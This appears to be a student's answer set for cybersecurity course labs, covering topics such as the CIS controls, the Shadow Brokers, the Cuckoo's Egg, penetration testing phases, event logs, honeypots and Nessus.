Labs

Question 1

3. According to the Critical Security Controls, which of the Critical Security Controls is considered the most important to reducing risk in an enterprise environment?

Answer 1

CIS Control 1: Inventory and Control of Hardware Assets

Question 2

4. According to the Critical Security Controls, which of the Critical Security Controls is considered the least important to reducing risk in an enterprise environment?

Answer 2

CIS Control 20: Penetration Tests and Red Team Exercises

Question 3

9. Which of the Critical Security Controls specifies conducting security awareness training for a company’s employees

Answer 3

CIS Control 17: Implement a Security Awareness and Training Program

Question 4

10. Which of the Critical Security Controls is used when a potential security incident occurs within a
    Company?

Answer 4

CIS Control 19: Incident Response and Management

Question 5

11. Which of the Critical Security Controls would application developers be most interested in?

Answer 5

CIS Control 18: Application Software Security

Question 6

2. The NSA ANT Catalog is a list of technological solutions available to NSA team members. What does ANT stand for?

Answer 6

Advanced Network Technology

Question 7

3. What is the name of the NSA “elite hacking force”?

Answer 7

Tailored Access Operations / Computer Network Operations

Question 8

What is the name given to the NSA hacking group by outside malware companies?

Answer 8

The Equation Group

Question 9

5. Who does Jack Rhysider interview for the podcast? What is the name of the interviewee’s company?

Answer 9

Jake Williams, Rendition InfoSec

Question 10

6. What is the Twitter handle of the person interviewed during the podcast?

Answer 10

MalwareJake

Question 11

7. Once the Shadow Brokers group stole NSA hacking tools, what did they attempt to do with the stolen tools?

Answer 11

Sell the information to the highest bidder

Question 12

8. Who did the Shadow Brokers refer to as “Dirty Grandpa”?

Answer 12

Joe Biden

Question 13

9. The Shadow Brokers stated that they had supported which President of the United States?

Answer 13

Donald Trump

Question 14

10. What was special about the interviewee that the Shadow Brokers revealed to the world?

Answer 14

He was a former member of TAO / The Equation Group

Question 15

11. What is the name of the institute that the interviewee teaches for?

Answer 15

SANS Institute

Question 16

12. What is the name of the exploit created by TAO which can be used to take full control of a Microsoft Windows system over SMB?

Answer 16

Eternal Blue

Question 17

13. How would an organization protect its Windows systems from the eternal blue exploit

Answer 17

Update Windows, an update came out that fixed the vulnerability a month earlier.

Question 18

14. The Shadow Brokers are believed to be aligned with which country?

Answer 18

Russia

Question 19

15. Why did the interviewee cancel travel to Singapore after the Shadow Brokers revelation that he was a member of TAO?

Answer 19

He may have played a part in TAO’s targeting of China. He could have been arrested.

Question 20

16. What is a “Zero Day” exploit?

Answer 20

An exploit that takes advantages of a vulnerability that is not yet known by security professionals. They have had “zero days” to prepare for the exploit.

Question 21

2. Chris mentions ‘d0x’ attacks or ‘d0xing’ a target. What is he describing?

Answer 21

Gathering personal information on his target

Question 22

3. What is Chris’ mantra for professional social engineering engagements?

Answer 22

“Leave them feeling better having met you.”

Question 23

4. What type of background noise does Chris use during his pretext phone call? (14:00)

Answer 23

Crying “sick” child

Question 24

5. In this same phone call from Question #4, Chris pretends to be his target’s what?

Answer 24

Personal assistant

Question 25

11. What is the domain name of Chris Hadnagy’s main site which teaches people about the risks associated with social engineering?

Answer 25

www.social-engineer.com

Question 26

2. What is the command line (non-GUI) version of Wireshark?

Answer 26

Tshark

Question 27

7. How long is an MD5 hash in bits?

Answer 27

128 bits

Question 28

8. How many bytes are displayed in an MD5 hash?

Answer 28

16 bytes

Question 29

9. How long is a SHA256 file hash in bits?

Answer 29

256 bits

Question 30

10. How many bytes are displayed in a SHA256 hash?

Answer 30

32 bytes

Question 31

11. Why would a member of law enforcement need to calculate the file hash for a file? (Minimum 25 words)

Answer 31

To make sure that they are downloading the file they intend to. If the file has been tampered with by a man in the middle.

Question 32

12. Why would someone else want to calculate a file hash after downloading a file? (Minimum 25 words)

Answer 32

Similar reasons as above. To make sure the file has not been tampered with. They can also be used to make sure the file did not get corrupted during the download.

Question 33

2. What is the first phase of Penetration Testing? Provide a brief overview of this phase (Minimum 25 words).

Answer 33

Pre-engagement: Where you discuss your plan with the organization. What is the scope of your test? What are the rules you need to follow? Once you have obtained authorization from the organization, you can begin phase 2.

Question 34

3. What is the second phase of Penetration Testing? Provide a brief overview of this phase (Minimum 25 words).

Answer 34

Engagement: This is where you actually begin investigating and “attacking” the organization. You will search for vulnerabilities in devices, networks, or employees. Once you have sufficient information you attempt to gain access to the organization through exploiting those vulnerabilities.

Question 35

4. What is the third phase of Penetration Testing? Provide a brief overview of this phase (Minimum 25 words).

Answer 35

Post-engagement: Creating a “findings report” consisting of the findings from penetration testing. Explain the vulnerabilities you found and suggest steps to fix them. Once those fixes have been implemented, you may want to validate that those fixes have stopped the vulnerabilities. Finally, hold a meeting with members of the organization and discuss your findings and actions taken to remedy them.

Question 36

5. The difference between an attacker and a penetration tester is that a professional penetration tester will always have what?

Answer 36

Authorization from the organization being “attacked”

Question 37

6. Using an automated scan to find security vulnerabilities is referred to as a what? How does this differ from a penetration test? (Minimum 25 words)

Answer 37

Vulnerability scan. A vulnerability scan usually comes before a penetration test and is, as the name suggests, a scan that detects potential vulnerabilities. A penetration test is where an ethical hacker attempts to attack and gain access to the organization’s systems.

Question 38

7. What is the name of the penetration testing framework established by a number of thought leaders in the penetration testing community?

Answer 38

Penetration Testing Execution Standard (PTES)

Question 39

8. What are the three different types of penetration tests? Describe each in enough detail for someone who is not familiar with the concept could understand. (Minimum 25 words).

Answer 39

The first type is Black Box, where no information about the organization is given to the tester beforehand. In the second type, White Box, any information the tester requests is given from the organization (such as IP addresses). Finally, Grey Box is a middle ground. Some information is provided to the tester, but it is limited.

Question 40

10. What is a type of attack that is usually not conducted during a penetration test? Why? (Minimum 25 words).

Answer 40

Denial of Service (DoS) attacks. These are not usually performed because it can affect the availability of the organizations systems. This can prevent the organization from functioning properly during the test.

Question 41

11. What is the final deliverable a penetration tester would provide to a client once the penetration test is complete? What are three things that this final deliverable should include? (Minimum 25 words)

Answer 41

Penetration Test Report. This should contain information on vulnerabilities that were found, how serious they are. and what actions can be taken to mitigate them. The report should be written so that people without technical knowledge can understand it.

Question 42

1. Access the dnslytics.com site and run a search for the gvltec.edu domain. What type of information is displayed under “WHOIS Information”?

Answer 42

Information about the domains in the registry database, The registrant of the domain, administrative and technical contact information, name servers, and domain registration, updated, and expiration dates.

Question 43

10. What version of Microsoft Windows server supports IIS 7.5?

Answer 43

Windows Server 2008 R2

Question 44

11. What is the main security concern with companies running IIS 7.5 after January 14th, 2020?

Answer 44

Software has reached EoL (End of Life) and will no longer be supported

Question 45

20. Before you can conduct a web app assessment against any of the web applications associated with the gvltec.edu domain, what do you need to do before conducting any active scans?

Answer 45

Gain authorization from the owner of the web site (Greenville Tech in this case)

Question 46

d. Why would a port show as being filtered?

Answer 46

A firewall is being used to filter network traffic

Question 47

4. Where did Cliff Stoll work when he was asked to investigate an accounting anomaly?

Answer 47

Computer center of Laurence Berkeley lab

Question 48

6. What is the name of the original account that Cliff Stoll identifies initially as having some initial configuration issues related to the accounting anomaly?

Answer 48

Hunter

Question 49

7. In the network attack scenario discussed with regards to “Locard’s Exchange Principle”, what were three different locations described where digital evidence could be left by a cyber attacker?

Answer 49

Sensor connected to a tap, Firewall, Database Activity Monitor

Question 50

8. Cliff Stoll is contacted by an outside entity that someone at LBL attempted to hack them. What was the name of the outside entity and the name of the system that was being targeted?

Answer 50

DockMaster

Question 51

9. As Cliff investigates, he tracks down a user account associated with the attack traffic described in Question #5 above. What is the name of this account?

Answer 51

Sventek

Question 52

11. What protocol is used to synchronize the system clocks on computer systems?

Answer 52

Network Time Protocol

Question 53

12. What was an interesting fact about the legitimate owner of the user account Sventek which makes Cliff Stoll believe there could be a cyber intruder on the network?

Answer 53

Sventek was in Cambridge, England at the time.

Question 54

What are the names of the three main Windows event logs?

Answer 54

Application, Security, System.

Question 55

2. Under ‘Windows Logs’, click on the ‘System’ event log. Run a search for Event ID 6013 using the ‘Find’ option. What type of information does the event display?

Answer 55

Total system uptime

Question 56

Why might a security analyst want to perform a backup of an event log?

Answer 56

In order to record a suspicious event or series of events in order to view them later or on another system.

Question 57

8. Search the Security event log for Event ID 4624. What is the purpose of this Event?

Answer 57

Logging a successful login attempt.

Question 58

9. If you see Event ID 4740 in the Security event log, what type of attack could be happening? If the event was not generated by malicious activity from an attacker but a normal user, what could be happening?

Answer 58

An attacker could be trying to crack a user’s password.

A user could have forgotten their own password.

Question 59

3. If a user is a system administrator for an organization, how many different user accounts (at a minimum) would they have? Why? (25 – 50 words)

Answer 59

Admins should have two accounts. The admin account should only be uses when required. The system administrator should also have a regular user account for more mundane usage.

Question 60

4. When investigating suspicious activity today, what is one location a system administrator or security analyst might review for a record of activity on the system?

Answer 60

logs

Question 61

5. Which software had vulnerability in it that allowed the attacker to overwrite another file on the affected system?

Answer 61

gnu emacs

Question 62

6. What is the name of the file/command that the attacker was able to replace? What is this file/command used for?

Answer 62

Atrun. A program that runs “housekeeping” tasks every 5 minutes.

Question 63

8. When installing an application, you should never give it the same permission level as what account on the system?

Answer 63

Admin

Question 64

9. As explained by Chris, what is the common thread between all attackers (25 - 50 words)?

Answer 64

They want to steal something. Whether that be money directly from you, information that may be valuable to them or someone else, or even your time or reputation.

Question 65

. How long did the “Shellshock” vulnerability exist before it was discovered and disclosed to the general public?

Answer 65

30 years

Question 66

What software was affected by the “Shellshock” bug?

Answer 66

Unix Bash Shell

Question 67

If a local user on an affected system exploits the “Shellshock” vulnerability, what type of access do they gain as a result of the local privilege escalation attack?

Answer 67

Root/Admin

Question 68

1. The attacker, Sventek, “screwed up”. How so? What was the attacker trying to get users to do? (25 50 words)

Answer 68

He put a password logger in the wrong directory. He was trying to get people to enter their passwords into a logger that would let him see their passwords.

Question 69

3. A cyber attack must only be as “______________” it has to be?

Answer 69

Sophisticated

Question 70

4. A user account on a computer system logically represents a what? How can this be exploited by an attacker? (25 - 50 words)

Answer 70

User accounts represent the users that hold them. An attacker that has stolen a user’s account can impersonate them and use any privileges they had.

Question 71

5. Where are the three places discussed that clear text passwords can exist?

Answer 71

In the user’s head, in transit on the network, and in limited places on the OS.

Question 72

6. Dave Kennedy wrote a tool for conducting social engineering attacks. What is the name of the tool? What does Chris use the tool to do during his demonstration?

Answer 72

Social Engineering Toolkit. He uses the credential harvesting mode to create a fake login page to send to users.

Question 73

7. What is the name of the tool Chris uses to dump clear text passwords from the operating system’s running memory?

Answer 73

mimikatz

Question 74

9. According to Chris, it is extremely important for cyber security investigators to make sure to always have a what on hand? What would they use it for? (25 - 50 words)

Answer 74

A notebook. A notebook is important because you will need to write things down frequently. You may need old information later on in your investigations.

Question 75

10. What tool does Chris use to decrypt password hashes?

Answer 75

John the Ripper

Question 76

3. Follow the instructions in the attached document to complete the assignment. Describe each step of the system boot process (25 words minimum each) as outlined in Figure 9-1 in the Chapter.

Answer 76

1. The BIOS ROM chip on the motherboard receives power from the PSU. It then conducts tests of various system function in a process called the Power On Self Test (POST)
2. The BIOS accesses the Master Boot Record on the storage device, which tells the BIOS the computer’s partition table and the location of the operating system bootloader.
3. The bootloader takes over control of the PC from the BIOS. The bootloader then begins the process of loading the operating system (or selecting one if the PC has a dual-boot configuration).
4. The Operating System, now loaded, begins loading startup programs and drivers for peripherals. A login screen is usually displayed for the user to select their account.

Question 77

How is the UEFI rootkit installed? (Minimum 25 words)

Answer 77

The rootkit utilizes RwDrv.sys (a legitimate, signed driver) kernel driver PC settings like PCI memory and ROMs. Another tool then dumps the settings to a text file, and another reads the SPI flash memory and makes a firmware image based on it. Finally, the UEFI malware is inserted into the firmware image and flashed onto the SPI memory.

Question 78

How does the UEFI rootkit work? (Minimum 25 words)

Answer 78

It utilizes a modified version of the LoJack software that contacted the APT’s server instead of Absolute Software (the developers of LoJack) to send remote code execution to the PC.

Question 79

How can the UEFI rootkit be removed? (Minimum 25 words)

Answer 79

Reinstalling Operating Systems and wiping HDDs will not remove a rootkit from your system. The only way is to flash the firmware with a known good copy of clean firmware.

Question 80

Which attacker group is being named as the party responsible for the UEFI rootkit?

Answer 80

An APT group known as Fancy Bear

Question 81

1. As part of his investigation, Cliff Stoll discovered that the attacker attempted to locate systems belong to the C.I.A. While the attacker did not find addresses for any systems, he did find information related to four different what?

Answer 81

Human users

Question 82

2. Teejay described the C.I.A. network s a “__________” trust network architecture.

Answer 82

Zero

Question 83

3. Cliff detected the attacker accessing the LBL network, not from a TYMNET connection, but from where else?

Answer 83

Livermore unclassified computers

Question 84

4. Shortly after Cliff learns of this new connection source, the attacker can break into the computer systems of another school. Which school did the attacker break into next and how?

Answer 84

MIT using credentials stolen from livermore

Question 85

5. According to Richard Bejtlich, what are the seven characteristics of defensible networks?

Answer 85

Monitored, inventoried, controlled, claimed, minimized, assessed, current

Question 86

6. What type of common security control is used to implement a perimeter-based network?

Answer 86

How many zones of trust exist in a standard perimeter-based network? A) Firewall B) Two, untrusted and trusted

Question 87

7. What are three security issues described with regards to the “shifting nature” of perimeter-based networks as described in the course?

Answer 87

Services outside of the perimeter (cloud services), location of employees can be everywhere, untrusted devices in trusted areas

Question 88

8. What is a common security attack that Google has essentially eliminated within their network by implementing a zero trust network?

Answer 88

phishing

Question 89

9. Of the three network security models described, which would be used for an ultra-secure network such as the computer network for a nuclear power plant?

Answer 89

Air Gapped

Question 90

10. As a piece of malware, how was Conficker able to infect systems at ultra-secure networks? To help address this issue, what was an example described on how employees can prevent this infection vector?

Answer 90

Conficker spread through both the network and USB devices, nullifying the purpose of the air gap. Epoxy was put into the USB drives on classified systems, rendering them useless and protecting them from infected USBs

Question 91

2. Describe why mobile device security is important. (Minimum 50 words)

Answer 91

Smartphones and mobile devices are incredibly powerful tools that contain large amount of personal data. As they are portable devices, they can be more easily lost or stolen. We often trust mobile devices with personal data like payment information or personal messages. That information could be stolen by a hacker.

Question 92

3. What is the most important thing to do in order to secure your mobile device?

Answer 92

Set up a screen lock and passcode

Question 93

4. What was the passcode for Kanye West’s iPhone as of October 11th, 2018. Let’s just hope he’s changed it since then!

Answer 93

000000

Question 94

5. Describe why firmware and app updates on mobile devices is important. (25 - 50 words)

Answer 94

Firmware and app updates can patch security vulnerabilities present in them. Even a slightly out-of-date piece of software with a single vulnerability can be a prime target for an attacker.

Question 95

6. Discuss the benefits and disadvantages of enabling tracking for mobile devices. (25 - 50 words)

Answer 95

One advantage is that if your device is lost or stolen, it can be easily tracked down or even remotely wiped. One disadvantage is that if an attacker gains access to your account they could see that information and find out where you live, work, and visit.

Question 96

1. The attacker Cliff Stoll was tracking appeared to also be accessing systems at Stanford and had uploaded a Calculus problem. What were the two pieces of information learned from this upload?

Answer 96

Where did these leads go? Student name (Knute Sears) and Teacher name (Mr. Maher). Cliff got his sister to search for school records of the two names, but they ultimately came up empty handed.

Question 97

2. If a corporate network is known to be compromised, what form of communication should employees not use?

Answer 97

Email

Question 98

4. What are three different risks associated with ad networks?

Answer 98

Nearly indistinguishable from malware network. Could contain hidden HTML forms to exploit browser password managers.

Question 99

5. What is one way to block the risks associated with ad networks on the systems that you manage?

Answer 99

Don’t participate in ad networks (use an adblocker)

Question 100

6. For Cyber Security professionals practicing OPSEC, how should we consider browsing the Internet to ensure safety and reduce (if not eliminate) the impact of malware?

Answer 100

Use a hypervisor for browsing.

Question 101

7. Why would someone want to “safify” their URL links they would embed in documents?

Answer 101

Replace the Ts in HTTP with Xs and enclose periods in brackets

Question 102

8. Describe attacker pivoting. (25 - 50 words)

Answer 102

When a hacker makes themself more difficult to track down. This is done by connecting to several different servers on the way to your destination. This disguises the attackers IP address.

Question 103

10. Based on the MITRE call data, Cliff updates his profile of the cyber intruder. In what two different ways does he does so?

Answer 103

First, he adds that the attacker is likely not a high school student because he is experienced in multiple operating systems (VMS and Unix). Second, he adds that the attacker usually logs in around midday on weekdays, but earlier on the weekend.

Question 104

1. What are four password requirements that should be followed when creating a strong password for the Master Key? Be sure that these requirements align with those discussed throughout the course.

Answer 104

a. A password should… be long (at least 14 characters)
b. A password should… be unique (not used in any accounts)
c. A password should… use both lower and upper case letters, as well as numbers and special characters
d. A password should… not contain dictionary words

Question 105

1. How does Cliff Stoll prevent the attacker from uploading malicious code to LBL systems?

Answer 105

he Introduces noise to the connection by dangling his keys next to the wire

Question 106

2. What does Greg Fennel from the C.I.A. tell Cliff and why?

Answer 106

“Just tell me what happened. Don’t embellish, don’t interpret.” He said this because he wanted to make his own conclusion based on the raw, unbiased evidence.

Question 107

4. Describe the meaning of the anchoring bias in Cyber Security. (25 - 50 words)

Answer 107

Anchoring bias is when someone get to attached (or “anchored”) to a theory that they believe is correct. This can distract them from the real cause of the problem if they turn out to be incorrect.

Question 108

5. What are three ways in which you can overcome bias?

Answer 108

1. Gain a better understanding of bias and how you are affected by it
2. Make your decisions based on evidence rather than your biases
3. Think about what it would look like if you turned out to be incorrect

Question 109

6. “It is ___________________ that your Windows Server will be compromised if you don’t patch it and don’t put it behind a firewall.”

Answer 109

Very likely

Question 110

7. What is the name of the bulletin board system Cliff used to find related information to his and other breaches? What is the current home page of the infamous hacker group Cliff learned about via this bulletin board?

Answer 110

Usenet

Question 111

9. Which aspect of The Diamond Model of Intrusion Analysis would be used to describe aspects of an attacker?

Answer 111

Adversary

Question 112

10. What were the names of the US Keyhole satellites mentioned?

Answer 112

Keyhole 9 & 10

Question 113

2. If you were assigning permissions to the ‘Accounting’ folder, which Share permissions would you give to the Accounting department? Which permissions would you give to other employees?

Answer 113

“Change” for accounting department. No permissions for other departments.

Question 114

4. If you were assigning permissions to the ‘General’ folder, which Share permissions would you assign?

Answer 114

Change for all users/groups

Question 115

5. When reviewing the Share permissions for the ‘Engineering’ folder, you notice that the ‘Everyone’ group has been assigned ‘Full Control’ permissions. Where could the assigned permission have come from?

Answer 115

It could be due to malware or a misconfiguration.

Question 116

6. Is the use of the ‘Everyone’ group on the engineering folder a security issue? Why or why not? (25 - 50 words)

Answer 116

Yes, it allows people not in the engineering department to have access to the engineering folder. This is a violation of the principle of least privilege.

Question 117

7. What specific type of malware could spread with the permissions assigned to ‘Everyone’?

Answer 117

Ransomware

Question 118

10. What would be another command an attacker could use to create a local user account if they were “living off of the land”?

Answer 118

Netplwiz

Question 119

11. (Optional - Extra Credit) What would be an example of a command an attacker could use to conduct a port scan of the compromised host’s network if “living off the land”?

Answer 119

netstat -a

Question 120

1. During this session, Chris discusses how an attacker has broken into one of LBL’s important systems.
   What is the name of the system and what is it used for? (25 - 50 words)

Answer 120

Bevatron. A machine for conducting research into how certain types of radiation can be focused to kill cancer cells without harming healthy ones. This is used as a treatment for cancer patients.

Question 121

2. Name three things Cliff does to address the attacker on the compromised system. (25 - 50 words)

Answer 121

First, he contacts the owner of the system. Second, he tells the owner to change all of the passwords on the compromised system. Finally, he kicks the attacker off the system without the attacker realizing that he is being watched.

Question 122

3. Provide a general overview of Industrial Control Systems (ICS). Include the names of three ICSspecific systems. (25 - 50 words)

Answer 122

ICS is a general term that defines a number of different systems that handle the management of systems that handle manufacturing, automation, and utilities such as power and water.

Question 123

4. Can an attacker cause a major disaster by hacking into an ICS environment such as a power plant or petrochemical facility? Why or why not? (25 - 50 words)

Answer 123

There are many different ways a hacker could do this. A hacker could stop water or power supply to entire areas. A hacker could also in some cases destroy a facility. Depending on what happens, this could even result in death.

Question 124

6. Provide a general overview of honeypots. (25 - 50 words)

Answer 124

Systems that are designed to be attacked. They sometimes have intentional vulnerabilities. Honeypots are usually used for research and sometimes for tracking worms. They are classified as low or high interaction based on how much the system can do. Honeypots are usually placed outside a network’s firewall.

Question 125

7. How did Cliff come up with the idea to create a honeypot to delay the attacker? (25 - 50 words)

Answer 125

His girlfriend suggested making a honeypot with fake information so that the attacker would have to take time to download them all. They also decide to add a mail form that could be filled out for more information in the off chance that the attacker fills it out.

Question 126

8. What are four characteristics of a tactical honeypot? Written in your own words.

Answer 126

A honeypot located in your own network (on your side of the firewall)
A honeypot that looks like the actual systems on your network
A honeypot that is low interaction so it can not do much
A honeypot that is set up to log as much as possible and alert the proper people when an incident occurs

Question 127

9. What is the name of one of the tools that can be used to create Canarytokens?

Answer 127

Canarytokens.org

Question 128

10. Where is it determined that the attacker’s calls are originating from?

Answer 128

Hanover

Question 129

11. Cliff Stoll visits the NSA and meets Bob Morris. What is significant about Bob Morris’ son?

Answer 129

He created the Morris worm, the first computer worm on the internet.

Question 130

1. Reviewing the default set of ‘Scan Templates’ provided, what is the name of the malware that is associated with MS17-010 vulnerability?

Answer 130

WannaCry

Question 131

2. How would someone address the MS17-010 vulnerability on a vulnerable Windows host?

Answer 131

Update Windows

Question 132

4. On the ‘Discovery’ selection page, what does the ‘ARP’ option do?

Answer 132

Sets the scan to ping hosts with Address Resolution Protocol

Question 133

5. If you wanted to ensure you scanned all available TCP ports rather than just the default set of ports, what would you enter in the ‘Port scan range’ field?

Answer 133

all

Question 134

6. On the ‘Credentials’ tab, what three options exist for supplying credentials?

Answer 134

SNMPv3
SSH
Windows

Question 135

7. Of the three options for supplying ‘Credentials’, which is the one that would most likely be used by Nessus to login to a Linux-based host?

Answer 135

SSH

Question 136

8. How many plugin checks exist to check for vulnerabilities in various DNS services?

Answer 136

202

Question 137

9. How many plugin checks exist to check for vulnerabilities in Industrial Control Systems? HINT: As discussed in class, these would be Industrial Controls Systems deployed over long geographic distances.

Answer 137

3

Question 138

10. How many total plugin checks exist to search for the presence of vulnerabilities on Windows hosts?

Answer 138

5008

Question 139

1. What type of password attack is described as used by the attacker and characterized as Bob Morris as “child’s play”?

Answer 139

Dictionary Attack

Question 140

3. What is the name of the persona used by the attacker to submit a request for physical files?

Answer 140

Laszlo J. Balogh

Question 141

4. What are four concerns discussed with regards to evidence handling? Describe each. (25 - 50 words each)

Answer 141

Permission: You need permission to gather the evidence. If you do not have proper authorization such as a warrant, the evidence may be illegal and possibly not accepted in court.

Volatility; Can the data or evidence be lost under circumstances? Many types of evidence can be temporary or fragile. In these cases, care needs to be taken to gather information without damaging losing anything.

Pollution: Attempts to gather information from evidence can result in the damage or destruction of information. For example, if you install software on a computer to gather information from it, the very act of installing it could tamper with the computers memory, storage, and logs.

Chain of Custody: There needs to be a record of everyone who has had custody of the evidence. Evidence should always be held by people qualified and trustworthy. If there is not a good record or someone unqualified or untrustworthy is in possession, the evidence could be damaged or tampered with.

Question 142

6. What is one good practice of evidence acquisition? (25 - 50 words)

Answer 142

Create a snapshot of the system memory. This allows the contents of the otherwise volatile RAM to be kept in a safe, nonvolatile location for analysis even if the computer loses power.

Question 143

7. What is the name of the primary attacker?

Answer 143

Markus Hess

Question 144

8. What confidential information of Cliff’s was exposed to the public and how did it occur?

Answer 144

Cliff’s logbook. Likely because the FBI gave a copy to the German Attaché who gave it to the German media.

Question 145

10. What ultimately happened to Karl “Habard” Koch?

Answer 145

Died under unusual circumstances. His death was ruled a suicide, but there is evidence that it may not have been.

Question 146

14. What does Pengo think is one thing wrong with the cyber security industry (that Chris agrees with)?

Answer 146

Cyber Security is an easy area to sell “snake oil”.

Question 147

15. What does pengo feel that is essential knowledge for someone wanting to become a cyber security professional?

Answer 147

A deep understanding of how systems work is necessary for a security professional to be able to help their clients

Question 148

3. If your company had a data center, what would be three different types of environmental controls you would expect it to have?

Answer 148

HVAC
Fire suppression (Class C especially)
Faraday cage or similar EM disruption protection

Question 149

5. Provide an overview of a “hot aisle/cold aisle” configuration. (25 – 50 words)

Answer 149

Hot isle/cold isle is a data center layout that is designed to maximize cooling and air flow. It is accomplished by alternating the direction each row of server racks faces. This creates “cold isles” where the air is taken into the racks and “hot isles” where the air is blown out.

Question 150

7. Provide an overview of Modbus

Answer 150

Modbus is an industrial control protocol for connecting industrial systems. It allows industrial systems to communicate with each other.

Question 151

8. What is the name of at least one Nmap NSE script which could be used to perform specific testing against the service from Step #8?

Answer 151

modbus-discover, which enumerates Modbus slave ids and device info

Question 152

port 123

Answer 152

Network time protocol

Question 153

port 161

Answer 153

SNMP